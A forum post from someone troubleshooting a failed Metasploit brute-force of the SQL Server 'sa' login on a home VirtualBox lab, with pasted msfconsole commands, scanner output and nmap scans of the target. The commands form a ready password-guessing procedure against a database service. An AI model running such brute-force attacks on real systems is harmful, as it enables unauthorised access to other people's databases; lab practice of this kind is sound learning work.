
Brute Forcing Ms Sql Server


Skorpinok Rover


Hello,

I have Backtrack 5R2 and a Windows XP SP2 machine with Microsoft's SQL Server 2005 Express installed in VirtualBox. When I try brute forcing MS SQL Server, I get a connection refused error. I tried many times to gain access, but it fails.

The firewall and AV are off. Please suggest how I can solve this. Many thanks in advance.

Regards.

msf auxiliary(mssql_ping) > use scanner/mssql/mssql_login

msf auxiliary(mssql_login) > show options

msf auxiliary(mssql_login) > set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt

PASS_FILE => /pentest/exploits/fasttrack/bin/dict/wordlist.txt

msf auxiliary(mssql_login) > set RHOSTS 192.168.56.102

RHOSTS => 192.168.56.102

msf auxiliary(mssql_login) > set THREADS 10

THREADS => 10

msf auxiliary(mssql_login) > set verbose false

verbose => false

msf auxiliary(mssql_login) > exploit

[*] 192.168.56.102:1433 - MSSQL - Starting authentication scanner.

[-] 192.168.56.102:1433 MSSQL - [00001/57048] - Bruteforce cancelled against this service. Enable verbose output for service-specific details.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(mssql_login) > set RHOSTS 192.168.56.102

RHOSTS => 192.168.56.102

msf auxiliary(mssql_login) > set THREADS 10

THREADS => 10

msf auxiliary(mssql_login) > set verbose true

verbose => true

msf auxiliary(mssql_login) > exploit

[*] 192.168.56.102:1433 - MSSQL - Starting authentication scanner.

[*] 192.168.56.102:1433 MSSQL - [00001/57048] - Trying username:'sa' with password:''

[-] 192.168.56.102:1433 MSSQL - [00001/57048] - connection failed

[-] 192.168.56.102:1433 MSSQL - [00001/57048] - Bruteforce cancelled against this service.

[*] Scanned 1 of 1 hosts (100% complete)

-------------------------------------------------------------------------------------------------------------------------------

nmap -sT -A -P0 192.168.56.102

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-13 18:23 GST

Nmap scan report for 192.168.56.102

Host is up (0.00056s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

3389/tcp open microsoft-rdp Microsoft Terminal Service

31337/tcp open Elite?

Host script results:

|_nbstat: NetBIOS name: NAVYA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ef:19:f6 (Cadmus Computer Systems)

|_smbv2-enabled: Server doesn't support SMBv2 protocol

| smb-security-mode:

| Account that was used for smb scripts: guest

| User-level authentication

| SMB Security: Challenge/response passwords supported

|_ Message signing disabled (dangerous, but default)

| smb-os-discovery:

| OS: Windows XP (Windows 2000 LAN Manager)

| Computer name: navya

| NetBIOS computer name: NAVYA

| Workgroup: WORKGROUP

|_ System time: 2012-06-13 18:25:50 UTC-7

| ms-sql-info:

| Windows server name: NAVYA

| [192.168.56.102\SQLEXPRESS]

| Instance name: SQLEXPRESS

| Version: Microsoft SQL Server 2005 RTM

| Product: Microsoft SQL Server 2005

| Service pack level: RTM

| TCP port: 1433

|_ Clustered: No

TRACEROUTE

HOP RTT ADDRESS

1 0.56 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 128.57 seconds

root@bt:~# nmap -sU 192.168.56.102 -p1434

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-13 18:26 GST

Nmap scan report for 192.168.56.102

Host is up (0.0017s latency).

PORT STATE SERVICE

1434/udp open|filtered ms-sql-m

MAC Address: 08:00:27:EF:19:F6 (Cadmus Computer Systems)
